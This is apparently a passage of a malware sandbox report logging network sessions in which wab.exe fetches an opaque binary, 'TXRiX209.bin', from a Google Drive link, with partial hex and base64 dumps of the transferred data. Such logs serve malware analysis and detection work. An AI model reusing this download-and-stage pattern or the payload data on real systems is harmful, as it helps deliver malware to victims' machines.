2024-09-09 06:55:10 UTC	4850	IN	Data Raw: 6c 74 58 70 47 44 6e 78 51 42 59 7a 77 78 73 64 6f 74 4c 75 31 6a 50 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 55 30 57 67 76 34 45 39 56 4b 66 31 74 46 51 62 5a 47 2b 66 75 51 52 2b 6b 4b 75 6c 34 59 69 34 45 4c 6a 6e 63 6b 74 43 49 36 75 6c 32 4b 31 4d 2f 72 6a 6e 6c 44 58 78 68 6e 33 50 73 4d 59 72 5a 4b 51 59 34 69 30 6a 62 51 6f 6c 7a 37 45 76 4d 66 71 59 4f 72 72 51 45 48 68 46 4e 34 6b 72 59 64 67 54 39 6b 4d 73 59 57 56 78 43 75 6c 54 4d 51 68 67 46 66 63 61 48 55 35 50 35 38 7a 46 42 6b 33 58 36 55 4a 6d 6f 64 5a 45 5a 30 6e 56 64 32 6e 4d 51 6c 68 61 66 79 75 66 64 41 54 44 68 41 51 54 64 6c 69 4b 4d 54 66 6d 4c 6d 48 7a 48 6c 37 56 6f 63 76 72 53 71 73 64 76 57 4e 55 6e 49 6c 6a 57 Data Ascii: ltXpGDnxQBYzwxsdotLu1jPSEqUzkhKlM5ISpTOSEqUzkhKlM5ISpTOSEqU0Wgv4E9VKf1tFQbZG+fuQR+kKul4Yi4ELjncktCI6ul2K1M/rjnlDXxhn3PsMYrZKQY4i0jbQolz7EvMfqYOrrQEHhFN4krYdgT9kMsYWVxCulTMQhgFfcaHU5P58zFBk3X6UJmodZEZ0nVd2nMQlhafyufdATDhAQTdliKMTfmLmHzHl7VocvrSqsdvWNUnIljW
2024-09-09 06:55:10 UTC	148	IN	Data Raw: 76 77 50 38 74 72 2f 2b 6f 2f 74 75 52 52 75 53 73 4d 64 34 67 70 53 38 34 31 38 6b 39 50 5a 66 37 31 44 58 46 46 52 6d 39 71 58 32 32 55 76 2f 2b 56 77 50 52 4c 2b 72 70 49 7a 54 36 6d 46 6f 6d 42 7a 74 65 6c 6d 72 6f 6f 64 79 50 6b 79 34 30 41 71 6e 62 54 69 72 6b 6d 48 47 31 74 4a 72 76 61 4f 78 4f 43 75 33 61 2f 46 65 50 66 6f 72 59 70 4a 36 33 49 78 32 69 73 52 71 62 31 5a 34 4f 32 58 62 38 70 43 4a 64 51 2f 73 38 68 47 37 59 66 2f 63 Data Ascii: vwP8tr/+o/tuRRuSsMd4gpS8418k9PZf71DXFFRm9qX22Uv/+VwPRL+rpIzT6mFomBztelmroodyPky40AqnbTirkmHG1tJrvaOxOCu3a/FePforYpJ63Ix2isRqb1Z4O2Xb8pCJdQ/s8hG7Yf/c
2024-09-09 06:55:10 UTC	1323	IN	Data Raw: 51 4f 6c 6e 76 74 75 4b 7a 59 52 62 31 4f 71 35 31 38 6d 34 30 73 42 37 45 61 73 41 65 78 4b 2f 59 48 61 68 37 68 55 6a 4b 6c 50 31 31 62 62 74 52 33 75 41 5a 53 59 37 33 6c 49 35 36 6b 47 52 55 79 56 47 31 72 77 45 36 47 6a 31 5a 42 2f 59 4f 38 4b 6d 49 73 6c 35 38 34 59 48 33 4b 50 57 35 69 41 71 55 37 44 5a 65 74 69 38 2f 69 74 54 4f 55 6b 33 53 72 5a 6c 54 46 7a 2b 45 43 70 54 4f 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 4f 55 4c 78 42 35 6f 39 37 68 39 7a 44 41 2b 43 70 6f 4d 54 4c 6d 62 6d 6e 32 4a 4a 63 4b 74 2f 48 63 47 45 33 43 35 32 6c 58 6d 2b 54 46 66 53 7a 6b 46 62 77 4d 43 67 33 52 46 4c 33 36 37 61 4c 75 55 31 74 59 50 79 73 45 75 49 31 31 37 72 75 6c 72 48 6d 47 6e 73 58 75 33 76 42 44 79 Data Ascii: QOlnvtuKzYRb1Oq518m40sB7EasAexK/YHah7hUjKlP11bbtR3uAZSY73lI56kGRUyVG1rwE6Gj1ZB/YO8KmIsl584YH3KPW5iAqU7DZeti8/itTOUk3SrZlTFz+ECpTOSEqUzkhKlM5ISpTOSEqUzkhKlM5ISpTOULxB5o97h9zDA+CpoMTLmbmn2JJcKt/HcGE3C52lXm+TFfSzkFbwMCg3RFL367aLuU1tYPysEuI117rulrHmGnsXu3vBDy
2024-09-09 06:55:10 UTC	1390	IN	Data Raw: 6f 76 45 78 71 36 31 4d 50 45 78 34 42 2f 45 2f 56 45 4b 52 46 58 78 44 51 67 4d 6c 75 6d 72 61 2b 63 69 51 65 78 6c 6a 64 64 77 5a 41 37 6a 56 63 6d 34 49 33 38 41 6c 6a 4d 6a 71 51 68 55 32 4f 77 63 57 53 69 41 38 69 2b 32 35 34 54 47 72 34 65 2b 30 51 4e 53 4d 71 55 7a 6e 74 47 54 52 53 70 69 69 46 50 2b 37 5a 6c 4e 41 2f 54 78 72 38 4c 37 45 2f 66 41 79 53 2f 47 75 74 57 64 67 76 6f 6f 70 31 53 6c 50 75 41 48 32 71 5a 30 73 32 49 66 58 43 4f 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 4b 75 55 41 4a 50 41 4b 51 61 42 30 57 56 6b 49 42 72 41 48 6b 47 4f 4a 38 39 32 37 54 4c 67 75 55 37 43 6b 46 6c 49 35 49 65 61 6a 32 55 74 42 67 64 46 6d 6c 64 4f 53 71 45 4c 54 6b 2b 51 54 61 4b 31 34 78 47 Data Ascii: ovExq61MPEx4B/E/VEKRFXxDQgMlumra+ciQexljddwZA7jVcm4I38AljMjqQhU2OwcWSiA8i+254TGr4e+0QNSMqUzntGTRSpiiFP+7ZlNA/Txr8L7E/fAyS/GutWdgvoop1SlPuAH2qZ0s2IfXCOSEqUzkhKlM5ISpTOSEqUzkhKlM5ISpTOSEqKuUAJPAKQaB0WVkIBrAHkGOJ8927TLguU7CkFlI5Ieaj2UtBgdFmldOSqELTk+QTaK14xG
2024-09-09 06:55:10 UTC	1390	IN	Data Raw: 4d 6d 43 47 62 33 49 51 45 73 61 64 42 4a 55 54 35 59 38 68 72 43 42 61 78 46 63 6d 48 4a 54 72 49 72 78 65 66 63 49 75 4d 2f 52 67 47 71 58 35 6d 4c 44 50 78 56 30 69 6c 65 58 68 6b 35 42 6a 39 2b 34 62 36 41 75 72 6d 62 47 77 54 68 72 57 79 65 35 43 77 34 5a 74 31 64 6e 42 63 6f 75 37 57 49 35 49 53 70 54 4f 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 6f 7a 4c 4f 79 75 72 6f 33 6b 58 78 4b 53 37 71 4d 75 58 57 61 68 6a 4a 6e 34 66 54 68 2b 6f 38 37 59 6a 45 6b 6f 55 7a 6c 79 6b 55 70 6c 32 39 76 53 79 71 70 6a 4f 35 4b 67 32 58 49 4c 73 33 44 61 4b 68 71 4f 46 35 45 67 32 4f 54 59 33 34 69 57 53 56 70 77 2f 39 65 4d 78 37 59 51 73 4d 35 4f 34 5a 75 33 66 4f 74 46 54 6d 6b 6f 45 76 63 4b 41 65 55 61 53 57 69 53 Data Ascii: MmCGb3IQEsadBJUT5Y8hrCBaxFcmHJTrIrxefcIuM/RgGqX5mLDPxV0ileXhk5Bj9+4b6AurmbGwThrWye5Cw4Zt1dnBcou7WI5ISpTOSEqUzkhKlM5ISpTOSEqUzkhKlM5ISozLOyuro3kXxKS7qMuXWahjJn4fTh+o87YjEkoUzlykUpl29vSyqpjO5Kg2XILs3DaKhqOF5Eg2OTY34iWSVpw/9eMx7YQsM5O4Zu3fOtFTmkoEvcKAeUaSWiS
2024-09-09 06:55:10 UTC	1390	IN	Data Raw: 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 49 4b 76 37 65 6e 76 52 62 34 68 58 4f 58 43 54 53 6d 6e 30 62 74 4c 49 33 47 70 64 38 36 44 62 30 72 7a 50 76 74 4c 34 2f 35 50 78 43 36 44 72 37 6f 67 47 6d 51 43 6c 71 4d 6c 61 4d 72 79 76 6f 45 4d 31 4b 55 38 63 74 53 70 4a 65 72 67 47 32 6b 33 52 4c 72 65 43 62 70 51 44 6d 76 63 65 52 2f 73 63 75 48 65 6e 6a 50 38 72 6b 6e 62 73 36 38 67 70 73 74 36 44 6b 62 75 64 33 54 46 69 61 76 74 36 45 34 70 67 63 35 41 50 50 42 34 32 30 73 76 35 68 51 75 4a 6f 4d 44 57 4a 45 61 47 32 67 4d 54 77 33 50 41 62 69 62 31 38 30 33 66 42 55 4b 48 33 30 63 54 67 53 69 5a 35 74 47 65 4a 34 42 4e 35 76 30 2b 39 31 70 44 2f 44 44 4d 39 2f 6f 2b 63 41 4b 41 6d 6b 71 62 41 71 44 72 32 43 Data Ascii: hKlM5ISpTOSEqUzkhKlM5ISpTOSEqIKv7envRb4hXOXCTSmn0btLI3Gpd86Db0rzPvtL4/5PxC6Dr7ogGmQClqMlaMryvoEM1KU8ctSpJergG2k3RLreCbpQDmvceR/scuHenjP8rknbs68gpst6Dkbud3TFiavt6E4pgc5APPB420sv5hQuJoMDWJEaG2gMTw3PAbib1803fBUKH30cTgSiZ5tGeJ4BN5v0+91pD/DDM9/o+cAKAmkqbAqDr2C
2024-09-09 06:55:10 UTC	1390	IN	Data Raw: 6a 30 69 67 6f 50 47 73 42 66 5a 54 50 52 4c 70 37 36 4a 63 6c 70 4c 55 51 39 2f 52 53 42 69 2b 36 6c 58 67 6b 4f 46 51 54 2b 42 46 48 51 79 79 51 73 55 65 48 56 71 53 58 7a 74 39 69 76 73 38 72 6a 58 33 46 6a 78 6c 4b 75 6c 77 50 6b 6b 52 37 41 76 57 4b 76 50 31 48 42 78 79 2b 34 4b 45 65 39 6e 6c 4a 46 67 37 54 57 34 39 5a 41 4d 41 78 53 76 48 61 6c 43 52 32 34 6d 49 43 42 30 5a 6f 6e 59 46 53 4c 31 34 56 51 67 6e 32 6b 38 34 49 35 72 2f 77 6c 6a 76 2b 41 2f 2f 52 55 55 50 48 36 54 64 37 62 78 5a 30 59 46 54 52 30 32 4a 41 43 6b 55 31 45 35 49 61 48 57 51 43 4d 71 55 7a 61 73 41 56 55 35 49 58 76 71 2f 52 4a 57 45 4c 6a 51 6c 4a 2b 61 54 71 75 53 71 31 6f 4b 67 4c 41 34 4d 7a 64 69 77 6d 31 39 39 41 56 67 53 79 6b 6d 62 4a 70 52 75 42 71 4e 66 6c 50 56 Data Ascii: j0igoPGsBfZTPRLp76JclpLUQ9/RSBi+6lXgkOFQT+BFHQyyQsUeHVqSXzt9ivs8rjX3FjxlKulwPkkR7AvWKvP1HBxy+4KEe9nlJFg7TW49ZAMAxSvHalCR24mICB0ZonYFSL14VQgn2k84I5r/wljv+A//RUUPH6Td7bxZ0YFTR02JACkU1E5IaHWQCMqUzasAVU5IXvq/RJWELjQlJ+aTquSq1oKgLA4Mzdiwm199AVgSykmbJpRuBqNflPV
2024-09-09 06:55:10 UTC	1390	IN	Data Raw: 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 42 59 65 6c 66 6b 5a 38 6f 4d 53 62 33 73 4d 55 30 73 2b 37 74 48 6b 37 6f 4f 79 4a 4e 38 62 52 41 71 57 6f 79 31 6f 49 76 42 4f 53 54 6a 79 45 6b 31 74 79 34 63 73 76 6d 75 67 48 62 4d 49 46 4b 72 74 61 73 69 75 51 52 36 39 71 2f 67 47 69 35 32 62 56 48 79 4a 51 74 37 75 66 47 59 70 4d 61 75 68 34 72 35 68 6e 6f 42 35 33 6a 4e 65 4f 57 62 67 4e 44 68 74 77 68 50 4b 66 4c 6e 4e 42 4e 62 49 67 78 42 4e 5a 55 6f 79 64 32 6c Data Ascii: AACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgABYelfkZ8oMSb3sMU0s+7tHk7oOyJN8bRAqWoy1oIvBOSTjyEk1ty4csvmugHbMIFKrtasiuQR69q/gGi52bVHyJQt7ufGYpMauh4r5hnoB53jNeOWbgNDhtwhPKfLnNBNbIgxBNZUoyd2l
2024-09-09 06:55:10 UTC	1390	IN	Data Raw: 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 58 5a 46 6b 67 6f 55 73 34 7a 6c 50 31 52 75 73 74 6a 50 6e 78 38 6c 4e 45 4a 6e 52 72 61 39 58 4f 61 69 76 63 7a 73 68 4b 67 53 47 4c 45 5a 31 45 71 44 64 59 45 4b 6c 6f 74 4c 4f 49 39 61 2f 58 4b 44 46 61 43 31 69 78 74 4c 2b 79 48 53 6e 48 4b 67 56 39 4e 52 44 57 7a 4a 50 72 74 50 70 65 6f 43 74 59 5a 7a 59 33 33 68 6a 68 78 2b 50 2b 6e 37 43 61 6f 41 6e 4d 4b 64 62 34 77 64 39 58 66 42 4d 73 5a 54 41 64 64 30 42 42 63 4c 6b 4f 66 63 74 67 53 62 4f 64 65 75 36 75 45 41 43 4e 69 65 2f 64 6a 6b 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 55 7a 6b 68 4b 6c 4d 35 49 53 70 54 4f 53 45 71 55 7a 6b 68 4b 69 4e 67 37 4f 38 67 4b 6a 55 71 5a 74 74 43 64 74 45 4d 62 62 49 58 Data Ascii: SEqUzkhKlM5ISpTOSEqUzkhKlM5ISpTXZFkgoUs4zlP1RustjPnx8lNEJnRra9XOaivczshKgSGLEZ1EqDdYEKlotLOI9a/XKDFaC1ixtL+yHSnHKgV9NRDWzJPrtPpeoCtYZzY33hjhx+P+n7CaoAnMKdb4wd9XfBMsZTAdd0BBcLkOfctgSbOdeu6uEACNie/djkhKlM5ISpTOSEqUzkhKlM5ISpTOSEqUzkhKiNg7O8gKjUqZttCdtEMbbIX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49707	142.250.185.238	443	7396	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-09 06:55:33 UTC	216	OUT	GET /uc?export=download&id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2024-09-09 06:55:34 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 09 Sep 2024 06:55:34 GMT Location: https://drive.usercontent.google.com/download?id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-eXmm6vPYqC8LF2gYSsM3IQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49708	142.250.181.225	443	7396	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-09 06:55:34 UTC	258	OUT	GET /download?id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-09-09 06:55:37 UTC	4852	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="TXRiX209.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 494656 Last-Modified: Mon, 09 Sep 2024 04:29:38 GMT X-GUploader-UploadID: AD-8ljvh3sgXaG4itsejgOdr8zocS119TR2_A6YJrTY9kmLWuOjH4MMb19LSEOl-w3NnXg4L2Oajgj89kw Date: Mon, 09 Sep 2024 06:55:36 GMT Expires: Mon, 09 Sep 2024 06:55:36 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=vt6POQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-09 06:55:37 UTC	4852	IN	Data Raw: 40 1e 8b 04 03 48 e4 70 56 34 ca 7d b5 bf a6 11 0e b5 16 e8 02 6d 68 fa 1e c5 a9 4f 3b 34 2b e6 d3 f4 ce 0c 54 5b 6a 5d 19 c5 04 79 b5 ef 63 f9 5f fe 7c d5 46 17 ef 33 2e be dd ce 16 80 5a 83 85 48 11 c8 81 50 2d 8f f8 ed 9a d1 49 92 fa 26 ac 35 87 16 d7 32 94 c3 21 21 58 98 e1 dc cd 18 30 69 3c e1 26 5e 7b 3a 30 1e 7e 30 fd 0d ff 06 64 3d 8d 1b d1 90 c1 db bf 56 7e 08 83 41 a3 33 07 1b ce 14 f6 fc 46 7e 2c 1f cf 52 80 cb ad d3 18 74 33 c9 75 31 64 25 31 33 6b e0 af bf b4 44 32 45 2a 7b 49 83 04 92 59 39 17 11 b6 b5 63 56 78 f1 50 8a c3 84 97 f7 33 de 56 28 0d 58 92 4c 62 fe c2 ea c1 7b c5 fe 2d a5 a5 9d c5 fc 1e fb 1d ac f2 4a a2 f5 0e 8d f7 ff 93 43 a7 5b 6f b2 dd 3a b9 f0 1d ac cc b5 9d 5d 84 2e ce 4a 24 1d 6d 62 df d3 89 90 75 8d 48 3f 3f ae ea f4 d8 Data Ascii: @HpV4}mhO;4+T[j]yc_\|F3.ZHP-I&52!!X0i<&^{:0~0d=V~A3F~,Rt3u1d%13kD2E*{IY9cVxP3V(XLb{-JC[o:].J$mbuH??
2024-09-09 06:55:37 UTC	4852	IN	Data Raw: 58 3e d5 1e 88 d2 39 42 c2 91 8b 41 3b 48 ca 3e 01 40 a4 18 9d 04 d1 3f b8 5f 46 30 7a 99 47 f6 3a 94 42 9e eb 3e 32 b5 2d 35 ed 4b 96 a1 3c c1 04 17 8c d2 02 e9 f6 09 e3 75 d9 67 fb c7 30 34 73 76 e5 c0 14 f3 ac fe 07 28 71 52 b8 c4 a2 3a fc dd 96 4f ad e3 2f 41 f1 17 15 b2 75 a3 e2 2f 1d f2 10 9f 0e 20 8a 19 98 6c 38 f0 38 30 3c 1a 06 d7 a3 54 aa 9f 6c e2 46 13 0f da 6b 67 13 0b 2b d3 f2 8f 29 ba de d2 1c 06 2b 52 ac 58 ca 8a d2 31 5b bc a2 93 d9 97 13 61 33 58 1d de c8 66 47 47 88 61 4c 06 e0 3e d9 0a de 32 18 83 a1 40 64 b4 84 1c 14 7f a0 af f0 9c 0e 49 97 3f 1c 27 ab b1 8e 61 41 37 fa b4 1b 0c 9d 42 70 4c e4 15 02 41 0e e9 14 ee 3d ab fe 7a fa a2 1c 8b 9c 87 66 7a b3 b2 3f 5c 36 7b 6e b2 ae 9d 39 bd d0 35 83 65 a6 df 63 58 43 d1 d8 9a dd 4c 09 71 7e Data Ascii: X>9BA;H>@?_F0zG:B>2-5K<ug04sv(qR:O/Au/ l880<TlFkg+)+RX1[a3XfGGaL>2@dI?'aA7BpLA=zfz?\6{n95ecXCLq~
2024-09-09 06:55:37 UTC	141	IN	Data Raw: 66 ce af 9e 9a 65 9a 0b 4d 86 a7 16 72 74 3c d6 62 3c ac a3 3a 3c ab e4 ac ee 15 fa e6 51 f6 92 52 6f f6 2a 35 5b 5f 39 d1 4c 96 5a c5 ba 31 eb d0 85 54 54 3e f5 c5 65 d8 3e 4a 36 7f 43 78 ce 91 0a 9e fb 62 d6 e2 21 ad 90 77 80 ff 07 79 35 5f 77 8f fb 96 cc 5d 8e a3 38 0e 45 03 d9 95 89 eb 7f c3 c1 8e 68 8e fb 5c e6 e3 dc 04 7a 87 56 0b d0 fd 4d d4 dd ce e2 7e 29 dc 2c a8 38 fb a7 81 3a cb 4e 42 23 40 9f 50 e7 67 8a 41 Data Ascii: feMrt<b<:<QRo*5[_9LZ1TT>e>J6Cxb!wy5_w]8Eh\zVM~),8:NB#@PgA
2024-09-09 06:55:37 UTC	1324	IN	Data Raw: af c9 df d1 55 f2 9c 2c bf bb db 08 a0 99 89 b5 3d 3e d6 37 05 db 7d 21 4b 6f d9 06 82 19 52 01 48 2a 0d 2d d6 58 d9 9a 4c ce 5b 88 dc ff 6b bd 5b d4 75 fa be d1 fe de 6b a1 f9 b4 37 9d c1 57 1c f5 c3 57 1b 5b f6 ed 07 e4 50 cc 13 fd 2f 5b bd d4 a3 50 58 49 44 3d 98 db 08 94 84 d9 da f7 df 96 88 09 3c 19 1b d8 e8 97 7f 2d ad 91 b1 82 56 16 a6 cd 98 94 76 c5 4a 85 81 63 65 62 4b 21 9f b4 6e 36 3f ff b6 eb bd de 54 00 9c 27 3e 1c 0a 27 c0 1e 50 48 ac 1b c8 cc 38 51 10 84 e2 59 9d 93 65 29 ba a0 ea 79 c4 60 97 89 52 98 06 ad e2 f0 a1 ae 5f 50 67 42 9f f9 b3 07 b5 01 87 1c a3 4b b3 61 c0 3b f1 ca c7 f2 7b 50 00 1e 81 fd 61 9d da 0f 00 05 3c 38 ab c9 f7 96 1e 41 9c 0e b3 6a f1 e5 6a fc e0 73 e7 13 0a 3c 5b 06 67 41 1d 6c 69 8d ab 63 95 7b 8f 2a 80 e4 3b 7b 00 Data Ascii: U,=>7}!KoRH-XL[k[uk7WW[P/[PXID=<-VvJcebK!n6?T'>'PH8QYe)y`R_PgBKa;{Pa<8Ajjs<[gAlic{;{
2024-09-09 06:55:37 UTC	1390	IN	Data Raw: ad e0 4c 39 42 51 f2 56 21 9a 4d b0 e1 46 fe 21 71 cf f1 b3 81 79 9b 51 2e c7 47 85 a6 c8 33 67 b8 09 1a aa c3 ef 45 d3 92 c7 89 be 05 7c a0 54 cd 75 21 c0 db f3 f6 48 42 f6 51 11 59 70 f8 5f c6 3a 73 95 40 62 f5 ee 5b 2e c1 61 d1 ea 79 ea 9e a4 42 df b6 41 3d c3 c5 04 1d ca 0f 6e e9 49 46 0f 0b 16 14 3c 22 84 60 80 cd 64 b8 75 7d 98 f9 71 82 da 46 53 eb 95 4f bc 19 ad ea b4 00 92 73 f9 07 d8 7d b9 35 79 35 9d b2 60 82 f7 b3 ea c1 f9 ef 80 ee 01 19 0c b9 7a 04 2f e7 1c ea 03 96 0b 89 91 a4 e5 f3 38 05 59 42 49 de 85 95 5a 65 d0 86 be d2 a6 18 4b fc f4 cf ae 5a 49 93 a2 6f 53 22 51 84 75 67 04 11 db 2f 43 5f d0 0c e5 f6 72 d6 39 4a 36 94 d9 7e ba ef f0 b1 b5 f9 9d cb 6c b9 c0 90 4c 43 02 85 b3 48 2e bc 69 00 df 53 73 da 56 83 69 32 26 2e 32 d1 83 32 9b 4c Data Ascii: L9BQV!MF!qyQ.G3gE\|Tu!HBQYp_:s@b[.ayBA=nIF<"`du}qFSOs}5y5`z/8YBIZeKZIoS"Qug/C_r9J6~lLCH.iSsVi2&.22L
2024-09-09 06:55:37 UTC	1390	IN	Data Raw: c4 9a 4c 7f 3d 32 bd 2f b2 2b 71 0d 5c 15 d5 ec 74 69 72 a3 b1 ba 67 70 b4 18 37 aa c8 98 8c 8c 9d 4b c1 d7 1a 12 fe 6d 28 12 bd ee e7 99 39 62 d2 c7 c4 63 61 11 ce 0f 00 56 76 fe 6d 22 bf c6 f6 73 29 7a 82 81 89 10 56 53 e3 44 b3 a9 e5 ef 12 47 f8 67 cc 84 74 68 04 11 31 41 98 bc 7f 69 3f 04 b6 e8 31 40 4d 28 45 c3 5b 10 fe b1 49 61 9d c3 32 22 cb ba a1 a7 76 b4 58 da dd 80 c6 24 5f dd db 4f d5 cc 94 51 c4 8d 25 c6 ec 91 40 df 10 52 28 17 bc d5 89 fc 07 b7 80 69 c1 e3 81 ae d2 93 6d 04 cb f9 f0 b4 ef 49 d7 ab 41 7f 33 f9 be 5b a5 b5 ee 29 71 01 85 13 66 7a 00 d9 b6 fa e7 a5 5a 8f 33 0f da ae 1f 25 ac 4e 5c 88 35 81 85 59 20 a2 9b 40 fb 1e 70 a7 94 9c 71 97 e6 4f 3f 1b cd 9c 23 33 a2 35 23 bc 11 91 3b 36 7b 94 1a f0 b9 c7 80 eb a1 67 b3 82 27 b3 b3 ee 60 Data Ascii: L=2/+q\tirgp7Km(9bcaVvm"s)zVSDGgth1Ai?1@M(E[Ia2"vX$_OQ%@R(imIA3[)qfzZ3%N\5Y @pqO?#35#;6{g'`
2024-09-09 06:55:37 UTC	1390	IN	Data Raw: 57 fe f6 31 e7 9b 38 5c 29 89 c0 95 f5 5e a2 69 33 73 71 00 a0 dd c6 67 ae 2e ce 32 5a 2c 7e 57 5c bf 89 f3 9f b9 a0 86 ef cf b3 e2 6a 6c 4a 29 70 47 4d 02 0a bf b7 bc c7 23 cf ff 04 56 46 a2 16 ca 15 6a b2 ee 8b 4e 01 85 1b 7a fd 45 2c 3c 86 b6 a4 3f 3b c8 a0 cd eb d8 ae 62 1a f3 d8 56 eb 89 03 36 5e a3 a8 09 24 98 8e a4 5a 6b eb dd c7 74 a1 17 63 4a 23 19 51 b7 9c 11 6d f4 dc d2 1b ac a3 92 f2 b7 6a ba c8 a4 66 32 4f 89 3d 4c 0c 23 33 84 9e 64 8b b4 52 1e fb 76 86 42 01 09 4c 8b dc b9 96 7f 1d 26 c3 09 36 ec a0 0b a4 27 00 c8 e8 9e ba 87 79 ae 37 99 47 96 40 54 2d d9 ae 66 6b 80 3d 21 de 36 fc 7c 87 16 d7 b9 5c 2b 5d c5 a7 67 b1 57 03 f0 79 86 c3 1e ad 98 25 f9 66 e1 0a 14 f5 86 0e 8d ae d5 99 f4 2e 6f 4a 13 57 4d 9a f7 64 10 28 fd e1 2c 9b e5 09 c3 89 Data Ascii: W18\)^i3sqg.2Z,~W\jlJ)pGM#VFjNzE,<?;bV6^$ZktcJ#Qmjf2O=L#3dRvBL&6'y7G@T-fk=!6\|\+]gWy%f.oJWMd(,
